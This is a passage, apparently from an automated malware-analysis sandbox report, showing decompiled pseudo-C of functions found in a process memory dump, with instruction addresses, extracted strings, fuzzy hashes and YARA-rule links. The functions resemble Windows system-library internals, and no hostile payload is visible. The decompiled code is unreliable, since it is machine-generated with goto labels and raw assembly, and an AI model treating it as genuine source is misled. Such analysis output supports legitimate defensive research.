								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0363f71d
0x0363f722
0x0363f726
0x03684770
0x0363f765
0x0363f769
0x0363f769
0x0363f732
0x0368477a
0x00000000
0x0368477a
0x0363f738
0x0363f73a
0x0363f73c
0x0363f73f
0x0363f746
0x0363f778
0x0363f7a9
0x0363f7a9
0x0363f754
0x0363f75a
0x0363f75d
0x0363f75f
0x0363f761
0x0363f76f
0x0363f771
0x0363f771
0x0363f76f
0x0363f763
0x00000000
0x0363f763
0x0363f77d
0x0363f7a3
0x0363f7a5
0x00000000
0x0363f7a5
0x0363f77f
0x0363f782
0x0363f784
0x0363f786
0x00000000
0x00000000
0x00000000
0x0363f788
0x0363f748
0x0363f74d
0x0363f78d
0x0363f793
0x0363f7b7
0x0363f7bc
0x00000000
0x0363f7bc
0x0363f798
0x00000000
0x00000000
0x0363f79d
0x0363f7b0
0x00000000
0x0363f7b0
0x0363f79f
0x00000000
0x0363f74f
0x0363f74f
0x00000000
0x0363f74f

Strings

Actx , xrefs: 0363F73F

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 932bed3b511ae3407b151132e2753cc90ed71c2e35047e3b71342d6723931707
Instruction ID: f94154ab61b16db7eb940e6fa0721a43eb3fb3fdb7425a6d696e0f946b11b3a5
Opcode Fuzzy Hash: 932bed3b511ae3407b151132e2753cc90ed71c2e35047e3b71342d6723931707
Instruction Fuzzy Hash: 3711B635F087028BEB24CE1DA69C736B2F9EB87664F28453AE465CF391DB70C8428340

Uniqueness

Uniqueness Score: -1.00%

Function 036C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E036C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x36f0d50);
				E0366D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E036A5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0366DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0366DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0366D130(_t34, _t39, _t40);
			}

0x036c8df1
0x036c8df1
0x036c8df1
0x036c8df1
0x036c8df1
0x036c8df1
0x036c8df3
0x036c8df8
0x036c8dfd
0x036c8e00
0x036c8e0e
0x036c8e2a
0x036c8e36
0x036c8e38
0x036c8e3c
0x036c8e46
0x036c8e46
0x036c8e36
0x036c8e50
0x036c8e56
0x036c8e59
0x036c8e5c
0x036c8e60
0x036c8e67
0x036c8e6d
0x036c8e73
0x036c8e74
0x036c8eb1
0x036c8ebd

Strings

Critical error detected %lx, xrefs: 036C8E21

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: c96f66cc3e841592941aebd53c44122e10852b33db003f72d384e79e45655b3e
Instruction ID: a4105a7b0f73172b045a7c23e494ecf90f3c54c2473366842b3b429b8f6a67a1
Opcode Fuzzy Hash: c96f66cc3e841592941aebd53c44122e10852b33db003f72d384e79e45655b3e
Instruction Fuzzy Hash: 04115775E24388DADF24CFA989057ADBBB0FB48355F24425ED569AB382C3744A02CF19

Uniqueness

Uniqueness Score: -1.00%

Function 036AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 036AFF60

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 16939b495d8ddedbc8901a56f57b3101db9b1f862243fc9de768c8a3da9c3d86
Instruction ID: 7563d5d2feab1454400194c7a1f64c7df0fee38a3ff622c804c6849c5d3aa5e1
Opcode Fuzzy Hash: 16939b495d8ddedbc8901a56f57b3101db9b1f862243fc9de768c8a3da9c3d86
Instruction Fuzzy Hash: AB11ED75A10A44EFDB26EB54CE48F98BBB1BF08719F188458E1086F2A2C7799E40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 036E5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E036E5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x36f1178);
				E0366D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E036E4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0365D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E036E5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x37060e8;
								if( *0x37060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x37060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03659710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03656DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0365F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0365F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0365F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0365FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0365FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0365F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0365F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E036E4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0366D130(_t427, _t494, _t511);
				}
			}

0x036e5ba5
0x036e5baa
0x036e5baf
0x036e5bb4
0x036e5bb6
0x036e5bbc
0x036e5bbe
0x036e5bc4
0x036e5bcd
0x036e5bd3
0x036e5bd6
0x036e5bdc
0x036e5be0
0x036e5be3
0x036e5beb
0x036e5bf2
0x036e5bf8
0x036e5bfe
0x036e5c04
0x036e5c0e
0x036e5c18
0x036e5c1f
0x036e5c25
0x036e5c2a
0x036e5c2c
0x036e5c32
0x036e5c3a
0x036e5c3f
0x036e5c42
0x036e5c48
0x036e5c5b
0x036e5c5b
0x036e5c2c
0x036e5cb7
0x036e5cb9
0x036e5cbf
0x036e5cc2
0x036e5cca
0x036e5ccb
0x036e5ccb
0x036e5cd1
0x036e5cd7
0x036e5cda
0x036e5ce1
0x036e5ce4
0x036e5ce7
0x036e5ced
0x036e5cf3
0x036e5cf9
0x036e5cff
0x036e5d08
0x036e5d0a
0x036e5d0e
0x036e5d10
0x00000000
0x00000000
0x036e5d16
0x036e5d1a
0x00000000
0x00000000
0x036e5d20
0x036e5d22
0x036e5d25
0x036e5d2f
0x036e5d2f
0x036e5d33
0x036e5d3d
0x036e5d49
0x036e5d4b
0x00000000
0x00000000
0x036e5d5a
0x036e5d5d
0x036e5d60
0x00000000
0x00000000
0x036e5d66
0x036e5d69
0x00000000
0x00000000
0x036e5d6f
0x036e5d6f
0x036e5d73
0x036e5d79
0x036e5d7f
0x036e5d86
0x036e5d95
0x036e5d98
0x036e5dba
0x036e5dcb
0x036e5dce
0x036e5dd3
0x036e5dd6
0x036e5dd8
0x036e5de6
0x036e5dec
0x036e5dee
0x036e5df1
0x036e5df3
0x036e635a
0x036e635a
0x00000000
0x036e635a
0x036e5dfe
0x036e5e02
0x036e5e05
0x036e5e07
0x036e5e10
0x036e5e13
0x036e5e1b
0x036e5e1c
0x036e5e21
0x036e5e22
0x036e5e23
0x036e5e25
0x036e5e2a
0x036e5e2c
0x036e5e2e
0x036e5e36
0x036e5e39
0x036e5e42
0x036e5e47
0x036e5e4d
0x036e5e54
0x036e5e54
0x036e5e54
0x036e5e2e
0x036e5e5c
0x036e5e5f
0x036e5e62
0x036e5e64
0x036e5e6b
0x036e5e70
0x036e5e7a
0x036e5e7a
0x036e5e7a
0x036e5e6b
0x036e5e7e
0x036e5e7f
0x036e5e7f
0x036e5e81
0x036e5e87
0x036e5e8b
0x036e5e8c
0x036e5e8c
0x036e5e8c
0x036e5e9a
0x036e5e9c
0x036e5ea2
0x036e5ea6
0x036e5f50
0x036e5f50
0x036e5f57
0x036e5f66
0x036e5f66
0x036e5f66
0x036e5f68
0x036e5f6a
0x036e63d0
0x00000000
0x036e5f70
0x036e5f70
0x036e5f91
0x036e5f9c
0x036e5f9e
0x036e5fa4
0x036e5fa6
0x036e638c
0x036e6392
0x036e63a1
0x036e63a7
0x036e63af
0x036e63af
0x036e63bd
0x036e63d8
0x00000000
0x036e63d8
0x036e5fac
0x036e5fb2
0x036e5fb4
0x036e5fbd
0x036e5fc6
0x036e5fce
0x036e5fd4
0x036e5fdc
0x036e5fec
0x036e5fed
0x036e5fee
0x036e5fef
0x036e5ff9
0x036e5ffa
0x036e5ffb
0x036e5ffc
0x036e6000
0x036e6004
0x036e6012
0x036e6012
0x036e6018
0x036e6019
0x036e601a
0x036e601b
0x036e601c
0x036e6020
0x036e6059
0x036e605c
0x036e6061
0x036e6061
0x036e6022
0x036e6022
0x036e6022
